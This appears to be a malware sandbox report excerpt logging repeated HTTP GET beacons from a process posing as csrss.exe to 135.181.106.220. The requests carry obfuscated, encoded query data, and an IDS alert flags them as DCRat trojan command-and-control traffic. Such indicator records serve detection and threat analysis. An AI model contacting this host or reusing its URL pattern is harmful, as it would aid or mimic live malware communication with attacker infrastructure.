2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
2116 | csrss.exe | GET | 200 | 135.181.106.220:80 | http://135.181.106.220/JavascriptApi/72sql8/Dle2/1TrafficPublicpublic/8packetMariadb/httptest/1privateGame/Cpu7/Protect5test/Js/2/8/0/ProtectjavascriptprotonJavascript/Poll/JavascriptDle/httpdownloadsserver/Dumpprotect/Javascriptauth.php?11kVEIGgqDq2PBEGi=6DVejSrYuiXY5Ad&d3d72683d2c0232992cff4971111ff7e=gZjdTZjNDZhhjMxMTNxQjYjFDMjBDZhdjYyYTZlZzYkhzN4M2YhFDNyMzM0UDO0kDMyQDOwgjN&20e5506d7ac514eded4e5e7e8ef2b124=AZkRTOkJTZ3UTMyYDO5YjZ0ImZ3EzNiFWZ1cTZ0E2YxEGMkVmNyYDO&18828b6ecf39a1344d11ef65d30b5077=d1nI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W&5e8207655a113c04c1d3106096c113c6=0VfiIiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiI4ADZ1E2YmJGN4YmZ1gjNmFDZzUzN5MDO1AjZ5cDNwkjMyUDZkdzNxIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU90Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq50cWdEZ1xWRLd2bINFSCpnT1lERJFkQTZVUOVUS3FEROJDMT5EcCN1SOJlRLxmSzIGRCN1STh2QixmUuJmSKl2TpV1VihWNVZVUOtWSzl0ULJUOpR1bBl2YsJFSjhmUXF1ZNNTWwh2RjhmSzI1ZFBjUXJ0QalnRHpVdGdEZUpUaPlWVXJGa1UlVRR2aJNXSpRVavpWS1x2VitmRwMGcKNETplUaPl2YVFVVKNETpFFWhNkQD5kMBNkYoVjMiBnTzMGbaJjY5JkRJNTQ5N2M5ckW1xmMWl2bqlUeW1mV1xmMWl2dTZWaNhFZwVzRiBnWxwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVWwVzVZFDaHRGc4VUS0F0QaxGbtpFcOdlW35ESJBTOtRVavpWSup0Mil2dplUNnpWT6RTeNl3dD9EeNR1T1VFVOl2bqlka5ckYpdXaJVFerlkNJNVZ5JlbiFTOykVa3lWS1IFWhNnRHNGcOdVY1ZFWUd2aIRGcOVUSwZ0VhNnVYlFcxcjd2NzN2ZHTp9Ua0IjYwR2ValnSDxUardVWwh3VkhGbXZ3LrUmdvsSdJZTSTVGMsJTWpdXaJhXSq1UdVpnT4RTaOdXSqxUMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETp1keNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2MmNzNxQTN0EGOxcTYlZmY1UzYyUTYjNzYhNjMyUGMiwiIzQGOjVmMzMGOlJGN1UjZjFDO3I2MxUDOhRjY4MmNhhzNxI2MkR2YzIiOiYTZxcTZjVWZzU2YyMTM1UGOmZTNxEDMxkTYmFWZ2IWMiwiI3ETZlFTM0IDNwUDZ2EmYmVWNjJTM3IzY2QjMxAjZwMDMkZmY4ADZkJiOiIGOkhDOwIDMhZDOzczNlZDNyMzY0ImNmRmNwQzYjJTNis3W | FI | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2116 | csrss.exe | 135.181.106.220:80 | — | Hetzner Online GmbH | FI | malicious |
PID | Process | Class | Message |
---|---|---|---|
2116 | csrss.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |